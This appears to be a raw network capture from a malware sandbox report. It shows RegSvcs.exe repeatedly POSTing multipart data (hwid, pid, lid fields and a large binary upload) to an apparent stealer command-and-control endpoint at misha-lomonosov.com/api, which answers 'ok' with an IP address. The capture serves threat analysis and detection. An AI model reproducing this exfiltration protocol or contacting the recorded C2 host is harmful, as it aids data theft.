                                                                                              2025-01-12 08:13:06 UTC8779OUTData Raw: 2d 2d 31 53 4c 5a 5a 43 4a 30 59 41 34 30 49 32 57 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 31 53 4c 5a 5a 43 4a 30 59 41 34 30 49 32 57 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 53 4c 5a 5a 43 4a 30 59 41 34 30 49 32 57 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79 32 0d 0a
                                                                                              Data Ascii: --1SLZZCJ0YA40I2WE5Content-Disposition: form-data; name="hwid"A529D2F59DB73AF1B960CC18D99B375A--1SLZZCJ0YA40I2WE5Content-Disposition: form-data; name="pid"2--1SLZZCJ0YA40I2WE5Content-Disposition: form-data; name="lid"atxOT1--noviy2
                                                                                              2025-01-12 08:13:07 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:07 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=j161fc867b3ala4ivuuefou1uk; expires=Thu, 08 May 2025 01:59:45 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DI%2F0UsHla30Uh6lqCyKOVit4jkCNWAj%2FJfRfLIk%2FyNVxora17hWVwc6L6dWNMinsksDHAXrDY4BkkMLGygW2I5v59v8aur10lpfDWliFO5ngbbE2ule7AL%2Bylj6z7Q4E%2BlkasL5s"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf753e604228-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11200&min_rtt=1625&rtt_var=6429&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9720&delivery_rate=1796923&cwnd=209&unsent_bytes=0&cid=f3455226fe3e7ca6&ts=573&x=0"
                                                                                              2025-01-12 08:13:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-12 08:13:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449735172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:07 UTC276OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LJRTKWFWE
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20384
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:07 UTC15331OUTData Raw: 2d 2d 4c 4a 52 54 4b 57 46 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4c 4a 52 54 4b 57 46 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 4a 52 54 4b 57 46 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79 32 0d 0a 2d 2d 4c 4a 52 54 4b 57 46 57 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                              Data Ascii: --LJRTKWFWEContent-Disposition: form-data; name="hwid"A529D2F59DB73AF1B960CC18D99B375A--LJRTKWFWEContent-Disposition: form-data; name="pid"3--LJRTKWFWEContent-Disposition: form-data; name="lid"atxOT1--noviy2--LJRTKWFWEContent-Dis
                                                                                              2025-01-12 08:13:07 UTC5053OUTData Raw: 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7
                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                              2025-01-12 08:13:08 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:08 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=dq59s748ol3kl3mjkdh6nkrmrn; expires=Thu, 08 May 2025 01:59:47 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PnaFhBVrz1o%2FrCr5ks1rnkINn%2FoyJ7I%2FnwybqHz%2FlKXtZIJWuF2NqoNIoEuZs4e4YDOInxXCTs7opij0dNkD4EdCU6bz9U3oiEXdsDO977lqu4QOAFYOc61oJXn9pmSnDK7q4Gja"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf7c4f3643b7-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1643&rtt_var=621&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21340&delivery_rate=1753753&cwnd=238&unsent_bytes=0&cid=dffd90ba47c12b47&ts=637&x=0"
                                                                                              2025-01-12 08:13:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-12 08:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449736172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:09 UTC284OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=0TUEDHOX16N7XANBGL
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1409
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:09 UTC1409OUTData Raw: 2d 2d 30 54 55 45 44 48 4f 58 31 36 4e 37 58 41 4e 42 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 30 54 55 45 44 48 4f 58 31 36 4e 37 58 41 4e 42 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 54 55 45 44 48 4f 58 31 36 4e 37 58 41 4e 42 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79
                                                                                              Data Ascii: --0TUEDHOX16N7XANBGLContent-Disposition: form-data; name="hwid"A529D2F59DB73AF1B960CC18D99B375A--0TUEDHOX16N7XANBGLContent-Disposition: form-data; name="pid"1--0TUEDHOX16N7XANBGLContent-Disposition: form-data; name="lid"atxOT1--noviy
                                                                                              2025-01-12 08:13:10 UTC1132INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:09 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=l8o8n6h5cafndnovc8cshn12d6; expires=Thu, 08 May 2025 01:59:48 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QVwsUmSOzqgeRFuK4Xfo%2BaJDjAzdzIs%2BF5zBIvSRm0QVR0wnAU4dsJ7fWb%2BzP9y%2BVKXsgcnVcs3PkUpyAwL7CevgiEr0M%2By3qeelEKyyPSiqc2qAetT%2B9IHot8xqYRhlfSDMUM1"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf874d307288-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2090&min_rtt=1976&rtt_var=969&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2329&delivery_rate=1010031&cwnd=245&unsent_bytes=0&cid=39cbd630b1ef339a&ts=440&x=0"
                                                                                              2025-01-12 08:13:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2025-01-12 08:13:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449737172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:10 UTC286OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=4N82PGCOPHNZDQKM4W
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 587052
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 2d 2d 34 4e 38 32 50 47 43 4f 50 48 4e 5a 44 51 4b 4d 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 34 4e 38 32 50 47 43 4f 50 48 4e 5a 44 51 4b 4d 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 4e 38 32 50 47 43 4f 50 48 4e 5a 44 51 4b 4d 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79
                                                                                              Data Ascii: --4N82PGCOPHNZDQKM4WContent-Disposition: form-data; name="hwid"A529D2F59DB73AF1B960CC18D99B375A--4N82PGCOPHNZDQKM4WContent-Disposition: form-data; name="pid"1--4N82PGCOPHNZDQKM4WContent-Disposition: form-data; name="lid"atxOT1--noviy
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: a8 bb f2 5e 72 3d 4a ea 2c 8b 19 06 bf c2 70 55 84 36 32 19 5f 1c d2 de 91 d9 db a8 7a 8f 96 e4 4d 16 fa ac ef 26 86 eb 2e cf 8c 3c af 9f 46 6f 13 55 b6 0b d7 e6 eb e9 da 29 ed be 2d 1b fb 9e 35 2c 16 1e 0b 8c 50 e1 43 dc 24 0a 4f 82 66 0b 65 a9 d1 e7 14 29 e7 cb d8 3f 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74
                                                                                              Data Ascii: ^r=J,pU62_zM&.<FoU)-5,PC$Ofe)?1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[Put
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 8d 96 9c 18 d8 b5 ed db 1f c9 00 c5 e3 c1 4a 69 ea b2 68 b8 9f 11 f0 d7 c0 07 e6 38 4f 1d 02 56 aa db b8 d8 00 a8 cc 78 e0 e8 7d 53 35 f3 c8 f2 b3 fd 4c 63 cb f5 f5 02 41 60 93 69 6a c5 c6 19 b1 ac ef 21 ae 49 80 6f 63 f9 8a 27 44 e6 00 85 49 80 dc 4c 60 0f 94 e7 ec f0 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53
                                                                                              Data Ascii: Jih8OVx}S5LcA`ij!Ioc'DIL`X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 0b 5d cc 42 89 84 7e 24 67 83 4e 0b c2 45 52 70 19 ea 44 bf 46 6a 49 c7 cd 9e f2 fd e6 f9 8b c7 05 d5 a4 a4 a7 76 35 bc 5b f8 db 68 bd 20 4a b7 8b 4d 9b 49 4f cf b8 26 c2 fc 4d 2e 49 36 4c e1 f9 1e 18 20 48 a9 50 13 28 16 6a 16 8d 6d a8 bb 82 32 50 45 2e af 0f e9 43 86 af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48
                                                                                              Data Ascii: ]B~$gNERpDFjIv5[h JMIO&M.I6L HP(jm2PE.CK'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 5d fd d8 e0 ab 33 21 0e a6 03 37 ca fe 5f 03 31 2f 06 fa c0 e0 a9 23 08 92 ae 20 50 90 31 59 d2 3b 00 08 c9 be 54 de b7 ef 05 04 23 47 12 23 00 e4 de bc 7e e0 26 34 63 51 3c f9 75 58 0c 94 d4 78 08 72 0e e4 0a d7 eb 00 2f b5 fa 59 ce 85 ad 94 83 08 1d aa 4d bd 0a 18 fd ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8
                                                                                              Data Ascii: ]3!7_1/# P1Y;T#G#~&4cQ<uXxr/YML/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28U
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 8a d3 1b 31 88 63 9e 58 91 85 ff b6 cf cb 37 6e 84 fa ed c6 43 f8 ed 36 72 a8 00 54 84 00 e4 7b 86 81 e3 8c 84 e0 72 62 69 2a e8 2f 69 68 98 cc 81 c0 7b 1c 39 0e 13 83 0a f1 e1 8e 60 75 f1 78 fc 13 54 68 87 d1 f1 98 b3 07 cf d1 17 0b bc b9 d9 63 f1 f3 c4 fa 68 97 4f d5 a1 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c
                                                                                              Data Ascii: 1cX7nC6rT{rbi*/ih{9`uxThchOJ_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: c0 4e f5 eb 46 b2 0b 37 c6 03 34 19 05 d5 4f ef 10 42 45 05 81 77 f7 61 42 c2 21 a7 e7 81 7b 41 f2 df 35 62 1a 62 23 a1 8e ad 27 e0 33 fb 30 39 32 a1 01 27 62 b6 cc 1e cf 8e 62 f7 d5 21 f5 ea 5e fa 8a d6 3b 84 95 d5 cb 7a cd 56 a6 1c 4d 72 e7 1e 15 e3 bd c2 87 0f a7 8d 21 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18
                                                                                              Data Ascii: NF74OBEwaB!{A5bb#'3092'bb!^;zVMr!mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0a
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 74 83 24 db e6 0b 67 04 fd f1 63 8f 05 13 a5 c8 88 20 c2 a2 8c 88 c8 80 dd a3 da c1 c2 8e ea aa 2a c3 e6 41 c3 af 3d ba ee 7e 2b bd 69 ea 07 60 55 30 12 98 f5 bb b4 61 d9 9e ac f8 e4 f0 7e a3 db 80 e9 c8 20 90 56 54 bc f1 77 42 53 b7 18 f1 d2 ce 7b 20 7a 86 95 3a 3c f8 8e db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1
                                                                                              Data Ascii: t$gc *A=~+i`U0a~ VTwBS{ z:<JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 2f 00 75 68 f1 f5 84 c8 c4 cd fd 99 c0 ad 2e d1 17 87 60 04 9f e1 8e e7 0f 64 e1 5e 23 a0 4b f0 9b 13 fc bd 9f 75 19 a2 7e 34 84 9f 6d 60 a2 ff 2e 11 86 28 16 94 38 fa 33 59 7a d4 77 40 a9 77 b5 59 d7 df 2c c8 c3 af 87 2a 41 d9 2d cd a3 b4 a1 f3 50 0e 0d 09 5a c4 e6 ff 64 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1
                                                                                              Data Ascii: /uh.`d^#Ku~4m`.(83Yzw@wY,*A-PZdPAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`
                                                                                              2025-01-12 08:13:10 UTC15331OUTData Raw: 5d bc c1 8a 26 bd 2a ea 97 03 63 0f 49 ac 87 e8 f8 37 3d 95 ee b4 a1 94 16 33 4e 3e b9 08 2a fe e0 7e 30 a6 ae 1a 5a 49 24 8b 80 9f d8 b6 de 5d b2 0a 11 20 34 34 4d bc 50 3e 71 fa 7a f1 48 bf 7f 12 47 81 52 9a ab dc 98 e0 61 98 c3 df cc 67 95 e5 e8 ab b0 9a c3 48 50 6b 7f 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53
                                                                                              Data Ascii: ]&*cI7=3N>*~0ZI$] 44MP>qzHGRagHPk]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES
                                                                                              2025-01-12 08:13:13 UTC1133INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=vr1tud839bpra7jll7v0e1f6rk; expires=Thu, 08 May 2025 01:59:51 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
